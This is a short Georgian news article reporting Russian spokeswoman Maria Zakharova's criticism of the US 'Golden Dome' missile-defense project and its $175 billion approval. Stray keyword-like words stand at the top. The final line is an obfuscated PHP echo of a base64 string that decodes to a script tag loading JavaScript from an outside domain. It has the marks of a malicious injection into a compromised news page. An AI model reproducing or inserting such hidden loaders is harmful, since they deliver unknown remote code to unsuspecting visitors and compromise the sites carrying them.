gorgia
jaluzi
ამერიკული რაკეტსაწინააღმდეგო სისტემის „ოქროს გუმბათის“ პროექტი სტრატეგიულ სტაბილურობას ძირს უთხრის, - ამის შესახებ რუსეთის საგარეო საქმეთა სამინისტროს პრესსპიკერმა, მარია ზახაროვამ ბრიფინგზე განაცხადა.

„ეს უკვე აშშ-ის უკიდურესად საშიში დოქტრინის მატერიალური გამოხატულებაა, რომელიც გულისხმობს ე.წ. პრევენციულ და რეალურად განიარაღების მიზნით დარტყმების განხორციელებას. ეს ავანტიურული მიდგომაა და სტრატეგიული სტაბილურობის საფუძვლებს ძირს უთხრის“, - განაცხადა მარია ზახაროვამ.

მისი თქმით, „ოქროს გუმბათის“ პროექტი კოსმოსში სამხედრო ოპერაციების ჩატარების მიზნით შეიარაღების გაძლიერებას ითვალისწინებს.

„მსგავსი ქმედებები კი იმის შესაძლებლობას ქმნის, რომ კოსმოსი დაპირისპირების არენად იქცეს“, - აღნიშნა ზახაროვამ.

შეგახსენებთ, გასულ კვირას აშშ-ის პრეზიდენტმა, დონალდ ტრამპმა 175 მილიარდი დოლარის ღირებულების „ოქროს გუმბათის“ პროექტი დაამტკიცა.

აშშ-ის პრეზიდენტის განცხადებით, „ოქროს გუმბათის“ თავდაცვითი ფარის პროექტი მისი საპრეზიდენტო ვადის ამოწურვამდე უნდა ამოქმედდეს.

175
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");